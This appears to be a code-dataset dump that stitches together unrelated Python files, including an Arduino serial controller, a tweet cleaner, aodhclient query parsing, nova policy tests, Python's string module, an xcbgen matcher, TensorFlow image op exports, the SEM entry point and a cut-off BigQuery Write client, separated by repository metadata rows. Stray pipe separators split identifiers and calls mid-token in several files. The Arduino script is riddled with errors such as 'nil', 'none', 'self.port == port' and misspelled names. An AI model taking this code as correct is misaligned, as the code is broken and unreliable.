will be pretty dumb just driving the lights and display
and also reading the rotary encoders.
Arduino sends
Lnn - Where nn is a number from 00 to 99 for locations.
Tnn - Where nn is a number for the hours.
Python sends
Vnn - Where nn is a number from 00 to 25 for | the LED value
"""
from test_data import *
import serial
import logging
class Arduino():
def __init__(port, data_values):
self.port == port
self.data_values = data_values
self.arduino = open_arduino(port)
self.currentTime = 8
self.currentLocation = 1
def write(self, message):
"""Writes a simple stri | ng to the arduino"""
err = none
debug("Sending {}".format(message))
self.arduino.writeline(b(message))
return err
def arduino_read(self):
msg = arduino.readline()
if msg.startswith("T"):
self.process_time(self, msg)
elif msg.startswith("L"):
process_location(msg)
else:
error("Unknown message: {}".format(msg))
def process_time(self, msg):
global current_location
value, err = split_message(msg)
if err != nil and value < 24 and value >= 0:
debug("Recived temperature: {}".format(value))
current_location["time"] = value
new_gas_level = get_gas_value()
self.arduino.write("L{}".format(new_gas_level))
else:
error("Recived duff temperature:'{}'".format(msg))
def open_arduino(port):
"""Just connect to the serial port for now
there should probably be some more error checking!"""
arduino = serial.Serial(port, 57600)
# Wait for it to come alive. Assume you send a hello
# string or some such at boot and it will reboot on reconnect
firstline = audiono.readline()
logging.debug("Arduino Starting... {} ".format(firstline))
return arduino
def split_message(msg):
"""Assumes Letter followed by a number"""
err = False
value = int(msg[1:2])
return value, err
def get_gas_value():
"""Return the gas value at the current location
For now we are just doing NO2"""
global source_data
global current_location
global locations
gas = NO2
location_data = [ x for x in source_data if x['location'] == locations[current_location["location"]] ]
location_data_for_gas = [(x['date'], x['value']) for x in location_data if x['gas'] == 'NO2']
# TODO need to actually work here. Just fudge it for now
return location_data_for_gas[0][1]
def run_server():
"""The main thread that runs the server"""
arduino = Arduino(port = '/dev/ttyUSBO')
arduino.set_temperature()
while True:
arduino.read(arduino)
if __name__ == "__main__":
# This is going to be global, so things
# can read from it when required.
source_data = extract_csv_to_list('input.csv')
current_location = {
'hour': 8,
'location': 1,
}
# Get this from the data above.
locations = ['Bootham Row', 'Gillygate']
run_server()
|
luozhaoyu/big-data-system | assignment3/partB/parsetweet.py | Python | mit | 2,168 | 0.006919 | #!/usr/bin/env python
import os,sys
import string
import re
import pickle
stopword_file = './stopwords'
class CleanTweet(object):
"""
case-sensitive, removed url, hashtag#, special term like 'RT', and reply@
"""
_url = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
_tweeterid = r'@\w{1,15}'
_retweet = r'^RT'
_nonascii = r'[^\x00-\x7F]+'
filter_re = [_url, _tweeterid, _retweet, _nonascii]
def __init__(self, rawtweet, stopwords=[]):
self._tweet = rawtweet
cleantweet = rawtweet
for ptn in self.filter_re:
cleantweet = re.sub(ptn, '', cleantweet)
punct = string.punctuation#.replace("'","")
cleantweet = cleantweet.translate(None, punct)
self._toks = cleantweet.lower().replace('\xe2','').split()
self._toks = [item.strip() for item in self._toks if item not in stopwords]
for w in self._toks:
if '\xe2' in w:
print w
self._cleantweet = ' '.join(self._toks)
def rawtweet(self):
return self._tweet
def cleantweet(self):
return self._cleantweet
def toks(self):
return self._toks
def __str__(self):
return self._cleantweet
infilename = sys.a | rgv[1]
outfilename = sys.argv[2]
tweets = []
stopwords = []
with open(stopword_file, 'rb') as fs:
for word in fs:
stopwords.append(word.strip())
fs.close()
with open(infilename, 'rb') as fi, open(outfilename, 'wb') as fo:
infile = fi.read() |
start = '['
stop = ']'
buf = ''
flag = False
for c in infile:
if c == start:
flag = True
continue
elif c == stop:
tweetobj = CleanTweet(buf, stopwords).cleantweet()
if tweetobj != '':
tweets.append(tweetobj)
buf = ''
flag = False
if flag:
buf += c
if len(tweets) >= 1000000:
break
pickle.dump(tweets, fo)
fi.close()
fo.close()
with open(outfilename, 'rb') as fo:
newlist = pickle.load(fo)
for t in newlist:
print t
|
chungg/python-aodhclient | aodhclient/utils.py | Python | apache-2.0 | 4,174 | 0.00024 | # -*- encoding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pyparsing as pp
uninary_operators = ("not", )
binary_operator = (u">=", u"<=", u"!=", u">", u"<", u"=", u"==", u"eq", u"ne",
u"lt", u"gt", u"ge", u"le", u"in", u"like", u"≠", u"≥",
u"≤", u"like" "in")
multiple_operators = (u"and", u"or", u"∧", u"∨")
operator = pp.Regex(u"|".join(binary_operator))
null = pp.Regex("None|none|null").setParseAction(pp.replaceWith(None))
boolean = "False|True|false|true"
boolean = pp.Regex(boolean).setParseAction(lambda t: t[0].lower() == "true")
hex_string = lambda n: pp.Word( | pp.hexnums, exact=n)
uuid = pp.Combine(hex_string(8) + ("-" + hex_string(4)) * 3 +
"-" + hex_string(12))
number = r"[+-]?\d+(:?\.\d*)?(:?[eE][+-]?\d+)?"
number = pp.Regex(number).setParseAction(lambda t: float(t[0]))
identifier = pp.Word(pp.alphas, pp.alphanums + "_")
quoted_string = pp.QuotedString('"') | pp.QuotedString("'")
comparison_term = pp.Forward()
in_list = pp.Group(pp.Suppress('[') +
pp.Optional(pp.delimitedList(co | mparison_term)) +
pp.Suppress(']'))("list")
comparison_term << (null | boolean | uuid | identifier | number |
quoted_string | in_list)
condition = pp.Group(comparison_term + operator + comparison_term)
expr = pp.operatorPrecedence(condition, [
("not", 1, pp.opAssoc.RIGHT, ),
("and", 2, pp.opAssoc.LEFT, ),
("∧", 2, pp.opAssoc.LEFT, ),
("or", 2, pp.opAssoc.LEFT, ),
("∨", 2, pp.opAssoc.LEFT, ),
])
def _parsed_query2dict(parsed_query):
result = None
while parsed_query:
part = parsed_query.pop()
if part in binary_operator:
result = {part: {parsed_query.pop(): result}}
elif part in multiple_operators:
if result.get(part):
result[part].append(
_parsed_query2dict(parsed_query.pop()))
else:
result = {part: [result]}
elif part in uninary_operators:
result = {part: result}
elif isinstance(part, pp.ParseResults):
kind = part.getName()
if kind == "list":
res = part.asList()
else:
res = _parsed_query2dict(part)
if result is None:
result = res
elif isinstance(result, dict):
list(result.values())[0].append(res)
else:
result = part
return result
def search_query_builder(query):
parsed_query = expr.parseString(query)[0]
return _parsed_query2dict(parsed_query)
def list2cols(cols, objs):
return cols, [tuple([o[k] for k in cols])
for o in objs]
def format_string_list(objs, field):
objs[field] = ", ".join(objs[field])
def format_dict_list(objs, field):
objs[field] = "\n".join(
"- " + ", ".join("%s: %s" % (k, v)
for k, v in elem.items())
for elem in objs[field])
def format_move_dict_to_root(obj, field):
for attr in obj[field]:
obj["%s/%s" % (field, attr)] = obj[field][attr]
del obj[field]
def format_archive_policy(ap):
format_dict_list(ap, "definition")
format_string_list(ap, "aggregation_methods")
def dict_from_parsed_args(parsed_args, attrs):
d = {}
for attr in attrs:
value = getattr(parsed_args, attr)
if value is not None:
d[attr] = value
return d
def dict_to_querystring(objs):
return "&".join(["%s=%s" % (k, v)
for k, v in objs.items()
if v is not None])
|
rahulunair/nova | nova/tests/unit/policies/test_admin_actions.py | Python | apache-2.0 | 5,313 | 0 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import timeutils
from nova.api.openstack.compute import admin_actions
from nova.compute import vm_states
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit.policies import base
class AdminActionsPolicyTest(base.BasePolicyTest):
"""Test Admin Actions APIs policies with all possible context.
This class defines the set of context with different roles
which are allowed and not allowed to pass the policy checks.
With those set of context, it will call the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(AdminActionsPolicyTest, self).setUp()
self.controller = admin_actions.AdminActionsController()
self.req = fakes.HTTPRequest.blank('')
self.mock_get = self.useFixture(
fixtures.MockPatch('nova.compute.api.API.get')).mock
uuid = uuids.fake_id
self.instance = fake_instance.fake_instance_obj(
self.project_member_context,
id=1, uuid=uuid, vm_state=vm_states.ACTIVE,
task_state=None, launched_at=timeutils.utcnow())
self.mock_get.return_value = self.instance
# Check that admin is able to change the service
self.admin_authorized_contexts = [
self.legacy_admin_context, self.system_admin_context,
self.project_admin_context]
# Check that non-admin is not able to change the service
self.admin_unauthorized_contexts = [
self.system_member_context, self.system_reader_context,
self.system_foo_context, self.project_member_context,
self.other_project_member_context,
self.project_foo_context, self.project_reader_context
]
@mock.patch('nova.objects.Instance.save')
def test_reset_state_policy(self, mock_save):
rule_name = "os_compute_api:os-admin-actions:reset_state"
self.common_policy_check(self.admin_authorized_contexts,
self.admin_unauthorized_contexts,
| rule_name, self.controller._reset_state,
self.req, self.instance.uuid,
body={'os-resetState': {'state': 'active'}})
def test_inject_network_info_policy(self):
rule_name = "os_ | compute_api:os-admin-actions:inject_network_info"
with mock.patch.object(self.controller.compute_api,
"inject_network_info"):
self.common_policy_check(self.admin_authorized_contexts,
self.admin_unauthorized_contexts,
rule_name,
self.controller._inject_network_info,
self.req, self.instance.uuid, body={})
def test_reset_network_policy(self):
rule_name = "os_compute_api:os-admin-actions:reset_network"
with mock.patch.object(self.controller.compute_api, "reset_network"):
self.common_policy_check(self.admin_authorized_contexts,
self.admin_unauthorized_contexts,
rule_name, self.controller._reset_network,
self.req, self.instance.uuid, body={})
class AdminActionsScopeTypePolicyTest(AdminActionsPolicyTest):
"""Test Admin Actions APIs policies with system scope enabled.
This class set the nova.conf [oslo_policy] enforce_scope to True
so that we can switch on the scope checking on oslo policy side.
It defines the set of context with scopped token
which are allowed and not allowed to pass the policy checks.
With those set of context, it will run the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(AdminActionsScopeTypePolicyTest, self).setUp()
self.flags(enforce_scope=True, group="oslo_policy")
# Check that system admin is able to perform the system level actions
# on server.
self.admin_authorized_contexts = [
self.system_admin_context]
# Check that non-system or non-admin is not able to perform the system
# level actions on server.
self.admin_unauthorized_contexts = [
self.legacy_admin_context, self.system_member_context,
self.system_reader_context, self.system_foo_context,
self.project_admin_context, self.project_member_context,
self.other_project_member_context,
self.project_foo_context, self.project_reader_context
]
|
jameswatt2008/jameswatt2008.github.io | python/Python核心编程/网络编程/截图和代码/概述、SOCKET/多进程copy文件/test/string.py | Python | gpl-2.0 | 11,854 | 0.00194 | """A collection of string constants.
Public module variables:
whitespace -- a string containing all ASCII whitespace
ascii_lowercase -- a string containing all ASCII lowercase letters
ascii_uppercase -- a string containing all ASCII uppercase letters
ascii_letters -- a string containing all ASCII letters
digits -- a string containing all ASCII decimal digits
hexdigits -- a string containing all ASCII hexadecimal digits
octdigits -- a string containing all ASCII octal digits
punctuation -- a string containing all ASCII punctuation characters
printable -- a string containing all ASCII characters considered printable
"""
__all__ = ["ascii_letters", "ascii_lowercase", "ascii_uppercase", "capwords",
"digits", "hexdigits", "octdigits", "printable", "punctuation",
"whitespace", "Formatter", "Template"]
import _string
# Some strings for ctype-style character classification
whitespace = ' \t\n\r\v\f'
ascii_lowercase = 'abcdefghijklmnopqrstuvwxyz'
ascii_uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
ascii_letters = ascii_lowercase + ascii_uppercase
digits = '0123456789'
hexdigits = digits + 'abcdef' + 'ABCDEF'
octdigits = '01234567'
punctuation = """!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
printable = digits + ascii_letters + punctuation + whitespace
# Functions which aren't available as string methods.
# Capitalize the words in a string, e.g. " aBc dEf " -> "Abc Def".
def capwords(s, sep=None):
"""capwords(s [,sep]) -> string
Split the argument into words using split, capitalize each
word using capitalize, and join the capitalized words using
join. If the optional second argument sep is absent or None,
runs of whitespace characters are replaced by a single space
and leading and trailing whitespace are removed, otherwise
sep is used to split and join the words.
"""
return (sep or ' ').join(x.capitalize() for x in s.split(sep))
####################################################################
import re as _re
from collections import ChainMap as _ChainMap
class _TemplateMetaclass(type):
pattern = r"""
%(delim)s(?:
(?P<escaped>%(delim)s) | # Escape sequence of two delimiters
(?P<named>%(id)s) | # delimiter and a Python identifier
{(?P<braced>%(id)s)} | # delimiter and a braced identifier
(?P<invalid>) # Other ill-formed delimiter exprs
)
"""
def __init__(cls, name, bases, dct):
super(_TemplateMetaclass, cls).__init__(name, bases, dct)
if 'pattern' in dct:
pattern = cls.pattern
else:
pattern = _TemplateMetaclass.pattern % {
'delim' : _re.escape(cls.delimiter),
'id' : cls.idpattern,
}
cls.pattern = _re.compile(pattern, cls.flags | _re.VERBOSE)
class Template(metaclass=_TemplateMetaclass):
"""A string class for supporting $-substitutions."""
delimiter = '$'
idpattern = r'[_a-z][_a-z0-9]*'
flags = _re.IGNORECASE
def __init__(self, template):
self.template = template
# Search for $$, $identifier, ${identifier}, and any bare $'s
def _invalid(self, mo):
i = mo.start('invalid')
lines = self.template[:i].splitlines(keepends=True)
if not lines:
colno = 1
lineno = 1
else:
colno = i - len(''.join(lines[:-1]))
lineno = len(lines)
raise ValueError('Invalid placeholder in string: line %d, col %d' %
(lineno, colno))
def substitute(*args, **kws):
if not args:
raise TypeError("descriptor 'substitute' of 'Template' object "
"needs an argument")
self, *args = args # allow the "self" keyword be passed
if len(args) > 1:
raise TypeError('Too many positional arguments')
if not args:
mapping = kws
elif kws:
mapping = _ChainMap(kws, args[0])
else:
mapping = args[0]
# Helper function for .sub()
def convert(mo):
# Check the most common path first.
named = mo.group('named') or mo.group('braced')
if named is not None:
val = mapping[named]
# We use this idiom instead of str() because the latter will
# fail if val is a Unicode containing non-ASCII characters.
return '%s' % (val,)
if mo.group('escaped') is not None:
return self.delimiter
if mo.group('invalid') is not None:
self._invalid(mo)
raise ValueError('Unrecognized named group in pattern',
self.pattern)
return self.pattern.sub(convert, self.template)
def safe_substitute(*args, **kws):
if not args:
raise TypeError("descriptor 'safe_substitute' of 'Template' object "
"needs an argument")
self, *args = args # allow the "self" keyword be passed
if len(args) > 1:
raise TypeError('Too many positional arguments')
if not args:
mapping = kws
elif kws:
mapping = _ChainMap(kws, args[0])
else:
mapping = args[0]
# Helper function for .sub()
def convert(mo):
named = mo.group('named') or mo.group('braced')
if named is not None:
try:
# We use this idiom instead of str() because the latter
# will fail if val is a Unicode containing non-ASCII
return '%s' % (mapping[named],)
except KeyError:
return mo.group()
if mo.group('escaped') is not None:
return self.delimiter
if mo.group('invalid') is not None:
return mo.group()
raise ValueError('Unrecognized named group in pattern',
self.pattern)
return self.pattern.sub(convert, self.template)
## | ######################################################################
# the Formatter class
# see PEP 3101 for details and purpose of this class
# The hard parts are reused from the C implementation. They're exposed as "_"
# prefixed methods of str.
# The overall parser is implemented in _string.formatter_parser.
# The field name parser is implemented in _string.formatter_field_name_split
class Formatter:
def format(*args, **kwargs):
if not args:
raise | TypeError("descriptor 'format' of 'Formatter' object "
"needs an argument")
self, *args = args # allow the "self" keyword be passed
try:
format_string, *args = args # allow the "format_string" keyword be passed
except ValueError:
if 'format_string' in kwargs:
format_string = kwargs.pop('format_string')
import warnings
warnings.warn("Passing 'format_string' as keyword argument is "
"deprecated", DeprecationWarning, stacklevel=2)
else:
raise TypeError("format() missing 1 required positional "
"argument: 'format_string'") from None
return self.vformat(format_string, args, kwargs)
def vformat(self, format_string, args, kwargs):
used_args = set()
result, _ = self._vformat(format_string, args, kwargs, used_args, 2)
self.check_unused_args(used_args, args, kwargs)
return result
def _vformat(self, format_string, args, kwargs, used_args, recursion_depth,
auto_arg_index=0):
if recursion_depth < 0:
raise ValueError('Max string recursion exceeded')
result = []
for literal_text, field_name, format_spec, conversion in \
self.parse(format_string):
# output the literal text
if literal_text:
result.append(literal_text)
# if there's a field, output it
if field_name is not None:
# this is some m |
OpenInkpot-archive/iplinux-xcb-proto | xcbgen/matcher.py | Python | mit | 3,534 | 0.00764 | '''
XML parser. One function for each top-level element in the schema.
Most functions just declare a new object and add it to the module.
For typedefs, eventcopies, xidtypes, and other aliases though,
we do not create a new type object, we just record the existing one under a new name.
'''
from os.path import join
from xml.etree.cElementTree import parse
import state
from xtypes import *
def import_(node, module, namespace):
'''
For imports, we load the file, create a new namespace object,
execute recursively, then record the import (for header files, etc.)
'''
new_file = join(namespace.dir, '%s.xml' % node.text)
new_root = parse(new_file).getroot()
new_namespace = state.Namespace(new_file)
execute(module, new_namespace)
if not module.has_import(node.text):
module.add_import(node.text, new_namespace)
def typedef(node, module, namespace):
id = node.get('newname')
name = namespace.prefix + (id,)
type = module.get_type(node.get('oldname'))
module.add_type(id, namespace.ns, name, type)
def xidtype(node, module, namespace):
id = node.get('name')
name = namespace.prefix + (id,)
type = module.get_type('CARD32')
module.add_type(id, namespace.ns, name, type)
def xidunion(node, module, namespace):
id = node.get('name')
name = namespace.prefix + (id,)
type = module.get_type('CARD32')
module.add_type(id, namespace.ns, name, type)
def enum(node, module, namespace):
id = node.get('name')
name = namespace.prefix + (id,)
type = Enum(name, node)
module.add_type(id, namespace.ns, name, type)
def struct(node, module, namespace):
id = node.get('name')
name = namespace.prefix + (id,)
type = Struct(name, node)
module.add_type(id, namespace.ns, name, type)
def union(node, module, namespace):
id = node.get('name')
name = namespace.prefix + (id,)
type = Union(name, node)
module.add_type(id, namespace.ns, name, type)
def request(node, module, namespace):
id = node.get('name')
name = namespace.prefix + (id,)
type = Request(name, node)
module.add_request(id, name, type)
def event(node, module, namespace):
id = node.get('name')
name = namespace.prefix + | (id,)
event = Event(name, node)
event.add_opcode(node.get('number'), name, True)
module.add_event(id, name, event)
def eventcopy(node, module, namespace):
id = node.get('name')
name = namespace.prefix + (id,)
event = module.get_event(node.get('ref'))
event.add_opcode(node.get('number'), name, False)
module.add_event(id, name, event)
def error(node, module, namespace):
id = node.get('name')
name = namespace.prefix + | (id,)
error = Error(name, node)
error.add_opcode(node.get('number'), name, True)
module.add_error(id, name, error)
def errorcopy(node, module, namespace):
id = node.get('name')
name = namespace.prefix + (id,)
error = module.get_error(node.get('ref'))
error.add_opcode(node.get('number'), name, False)
module.add_error(id, name, error)
funcs = {'import' : import_,
'typedef' : typedef,
'xidtype' : xidtype,
'xidunion' : xidunion,
'enum' : enum,
'struct' : struct,
'union' : union,
'request' : request,
'event' : event,
'eventcopy' : eventcopy,
'error' : error,
'errorcopy' : errorcopy}
def execute(module, namespace):
for elt in list(namespace.root):
funcs[elt.tag](elt, module, namespace)
|
allenlavoie/tensorflow | tensorflow/python/ops/image_ops.py | Python | apache-2.0 | 2,576 | 0 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either ex | press or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# | pylint: disable=g-short-docstring-punctuation
"""Image processing and decoding ops.
See the @{$python/image} guide.
@@decode_bmp
@@decode_gif
@@decode_jpeg
@@decode_and_crop_jpeg
@@encode_jpeg
@@extract_jpeg_shape
@@decode_png
@@encode_png
@@is_jpeg
@@decode_image
@@resize_images
@@resize_area
@@resize_bicubic
@@resize_bilinear
@@resize_nearest_neighbor
@@resize_image_with_crop_or_pad
@@central_crop
@@pad_to_bounding_box
@@crop_to_bounding_box
@@extract_glimpse
@@crop_and_resize
@@flip_up_down
@@random_flip_up_down
@@flip_left_right
@@random_flip_left_right
@@transpose_image
@@rot90
@@rgb_to_grayscale
@@grayscale_to_rgb
@@hsv_to_rgb
@@rgb_to_hsv
@@rgb_to_yiq
@@yiq_to_rgb
@@rgb_to_yuv
@@yuv_to_rgb
@@convert_image_dtype
@@adjust_brightness
@@random_brightness
@@adjust_contrast
@@random_contrast
@@adjust_hue
@@random_hue
@@adjust_gamma
@@adjust_saturation
@@random_saturation
@@per_image_standardization
@@draw_bounding_boxes
@@non_max_suppression
@@sample_distorted_bounding_box
@@total_variation
@@psnr
@@ssim
@@ssim_multiscale
@@image_gradients
@@sobel_edges
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_image_ops import *
from tensorflow.python.ops.image_ops_impl import *
# pylint: enable=wildcard-import
# TODO(drpng): remove these once internal use has discontinued.
# pylint: disable=unused-import
from tensorflow.python.ops.image_ops_impl import _Check3DImage
from tensorflow.python.ops.image_ops_impl import _ImageDimensions
# pylint: enable=unused-import
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = [
# ResizeMethod is not documented, but is documented in functions
# that use it.
'ResizeMethod',
]
remove_undocumented(__name__, _allowed_symbols)
|
YoannDupont/SEM | sem/__main__.py | Python | mit | 3,899 | 0.002565 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
file: __main__.py
Description: the entry point to SEM.
author: Yoann Dupont
MIT License
Copyright (c) 2018 Yoann Dupont
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import print_function
import logging
import os.path
import unittest
import sys
import sem
import sem.modules
from sem.logger import logging_format
from sem.misc import find_suggestions
sem_logger = l | ogging.getLogger("sem")
def valid_module(m):
return m.endswith(".py") and not (m.startswith(u"_") or m in ["sem_module.py", "pipeline.py"])
def main(args=None):
def banter():
def username():
import os
return os.environ.get("USERNAME", os.environ.get( | "USER", os.path.split(os.path.expanduser(u"~"))[-1]))
import random
l = [
u"Do thou mockest me?",
u"Try again?",
u"I'm sorry {0}, I'm afraid I can't do that.".format(username()),
u'The greatest trick this module ever pulled what convincing the users it did not exist.',
u"It's just a typo."
]
random.shuffle(l)
return l[0]
modules = {}
for element in os.listdir(os.path.join(sem.SEM_HOME, "modules")):
m = element[:-3]
if valid_module(element):
modules[m] = sem.modules.get_package(m)
name = os.path.basename(sys.argv[0])
operation = (sys.argv[1] if len(sys.argv) > 1 else "-h")
if operation in modules:
module = modules[operation]
module.main(sem.argument_parser.parse_args())
elif operation in ["-h", "--help"]:
print("Usage: {0} <module> [module arguments]\n".format(name))
print("Module list:")
for module in modules:
print("\t{0}".format(module))
print()
print("for SEM's current version: -v or --version\n")
print("for informations about the last revision: -i or --informations")
print("for playing all tests: --test")
elif operation in ["-v", "--version"]:
print(sem.full_name())
elif operation in ["-i", "--informations"]:
informations = sem.informations()
try:
print(informations)
except UnicodeEncodeError:
print(informations.encode(sys.getfilesystemencoding(), errors="replace"))
elif operation == "--test":
testsuite = unittest.TestLoader().discover(os.path.join(sem.SEM_HOME, "tests"))
unittest.TextTestRunner(verbosity=2).run(testsuite)
else:
print("Module not found: " + operation)
suggestions = find_suggestions(operation, modules)
if len(suggestions) > 0:
print("Did you mean one of the following?")
for suggestion in suggestions:
print("\t{0}".format(suggestion))
else:
print("No suggestions found...", banter())
if __name__ == "__main__":
main()
|
googleapis/python-bigquery-storage | google/cloud/bigquery_storage_v1beta2/services/big_query_write/async_client.py | Python | apache-2.0 | 35,099 | 0.001368 | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import (
Dict,
Optional,
AsyncIterable,
Awaitable,
AsyncIterator,
Sequence,
Tuple,
Type,
Union,
)
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.bigquery_storage_v1beta2.types import storage
from google.cloud.bigquery_storage_v1beta2.types import stream
from google.cloud.bigquery_storage_v1beta2.types import table
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import status_pb2 # type: ignore
from .transports.base import BigQueryWriteTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import BigQueryWriteGrpcAsyncIOTransport
from .client import BigQueryWriteClient
class BigQueryWriteAsyncClient:
"""BigQuery Write API.
The Write API can be used to write data to BigQuery.
"""
_client: BigQueryWriteClient
DEFAULT_ENDPOINT = BigQueryWriteClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = BigQueryWriteClient.DEFAULT_MTLS_ENDPOINT
table_path = staticmethod(BigQueryWriteClient.table_path)
parse_table_path = staticmethod(BigQueryWriteClient.parse_table_path)
write_stream_path = staticmethod(BigQueryWriteClient.write_stream_path)
parse_write_stream_path = staticmethod(BigQueryWriteClient.parse_write_stream_path)
common_billing_account_path = staticmethod(
BigQueryWriteClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
BigQueryWriteClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(BigQueryWriteClient.common_folder_path)
parse_common_folder_path = staticmethod(
BigQueryWriteClient.parse_common_folder_path
)
common_organization_path = staticmethod(
BigQueryWriteClient.common_organization_path
)
parse_common_organization_path = staticmethod(
BigQueryWriteClient.parse_common_organization_path
)
common_project_path = staticmethod(BigQueryWriteClient.common_project_path)
parse_common_project_path = staticmethod(
BigQueryWriteClient.parse_common_project_path
)
common_location_path = staticmethod(BigQueryWriteClient.common_location_path)
parse_common_location_path = staticmethod(
BigQueryWriteClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
BigQueryWriteAsyncClient: The constructed client.
"""
return BigQueryWriteClient.from_service_account_info.__func__(BigQueryWriteAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
BigQueryWriteAsyncClient: The constructed client.
"""
return BigQueryWriteClient.from_service_account_file.__func__(BigQueryWriteAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use | the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS en | dpoint; if the environment variabel is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return BigQueryWriteClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> BigQueryWriteTransport:
"""Returns the transport used by the client instance.
Returns:
BigQueryWriteTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(BigQueryWriteClient).get_transport_class, type(BigQueryWriteClient)
)
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, BigQueryWriteTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the big query write client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
